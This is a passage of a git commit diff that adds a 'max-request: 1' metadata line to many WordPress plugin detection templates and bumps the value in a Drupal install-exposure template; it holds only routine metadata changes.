http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index b2faa6cbbe..a05946ae5e 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -5,7 +5,7 @@ info: author: NkxxkN severity: low metadata: - max-request: 1 + max-request: 2 shodan-query: http.component:"drupal" tags: exposure,drupal diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ 